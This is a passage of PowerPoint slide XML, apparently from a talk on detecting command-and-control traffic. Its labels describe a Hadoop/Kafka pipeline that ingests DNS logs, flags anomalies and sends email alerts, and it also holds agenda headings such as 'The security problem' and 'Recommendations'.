          <p:cNvPr id="68" name="TextBox 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3B61AE-EAC6-40BC-9D4F-182C1AC12FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6981045" y="4577464"/>
            <a:ext cx="1613010" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anomalous logs are stored in HDFS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69" name="Straight Arrow Connector 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13660126-34AB-404D-82EC-28C681E41B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6891117" y="5181072"/>
            <a:ext cx="514090" cy="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70" name="TextBox 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64F9A47B-3135-40FF-B202-134C51AAE617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5792197" y="5035720"/>
            <a:ext cx="1205343" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Real-time email alerting of suspicious activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Straight Arrow Connector 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C388AB1B-C427-4AB0-A830-6E9EA2434836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5365581" y="5187971"/>
            <a:ext cx="514090" cy="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pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Picture 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D44446F-EB58-4D0C-8A4F-F74E069B1B41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect l="15190" t="22596" r="16618" b="23220"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4868191" y="5008417"/>
            <a:ext cx="432862" cy="343943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Cube 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DCA87F1-43F1-418E-BAD9-4878B24C60F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9061829" y="2182803"/>
            <a:ext cx="707932" cy="191908"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 36118"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gra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4" name="TextBox 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D4CB49D-8F90-421D-AFED-1F5C5630ACB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9730606" y="3820571"/>
            <a:ext cx="875586" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Saved for long-term storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="TextBox 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BB670E-7EBE-473C-8E99-33F26A581F6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8329403" y="4753856"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nim</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="TextBox 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61AC083A-2A12-49E4-9614-C5D23EFAFFD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9012272" y="4135084"/>
            <a:ext cx="774114" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logs are ingested &amp; identified as DNS logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="TextBox 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F96CD6E-ADF9-4A4A-B151-D67A6AFDC721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7072200" y="3854057"/>
            <a:ext cx="1212113" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HADOOP ECOSYSTEM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="TextBox 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35DB6476-B3E0-49AF-ABE3-558420F7E897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693209" y="4823528"/>
            <a:ext cx="906972" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="500" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anomalous logs placed into an alerts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="500" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kafka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="500" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> queue and email notifications generated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="TextBox 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E3285-42D7-427E-854F-B3AD5E866A7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9201266" y="4874405"/>
            <a:ext cx="906972" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="500" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logs are placed into a DNS queue in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="500" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kafka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="500" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for parsing and processing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="TextBox 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735CAE75-A706-4347-95B4-395ECE65B326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8573983" y="2874768"/>
            <a:ext cx="1719654" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logs aggregate back to a central server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Lightning Bolt 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E55D34-686B-4DAD-B546-B2200257AF75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16586649">
            <a:off x="9389853" y="2172141"/>
            <a:ext cx="193336" cy="1300831"/>
          </a:xfrm>
          <a:prstGeom prst="lightningBolt">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>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82" name="Group 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E5A44D-E0CB-47EE-9AF3-99E4D18D6541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="298210" y="5586617"/>
            <a:ext cx="6066580" cy="1017631"/>
            <a:chOff x="293151" y="3499875"/>
            <a:chExt cx="5427554" cy="777227"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83" name="Rectangle 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB0F71C-293C-4848-852F-B697BE457848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="293151" y="3499875"/>
              <a:ext cx="5427554" cy="777227"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="84" name="Picture 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12DFCDCE-73EA-4369-8550-91F0402C716E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="340309" y="3561273"/>
              <a:ext cx="5334676" cy="681540"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Rectangle 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{339063A1-7D12-439D-9949-41D16A496661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7279465" y="4033614"/>
            <a:ext cx="2563406" cy="2429684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000">
              <a:alpha val="2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32960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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36833E77-3BD5-48A1-B04E-4E1D995DD581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9831" y="1486184"/>
            <a:ext cx="12182168" cy="6091084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB8DD8B-0334-4D18-8795-20014E6B0D6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785746" y="2998358"/>
            <a:ext cx="4281302" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DETECTING C&amp;C </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WHAT THE TEAM SEES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
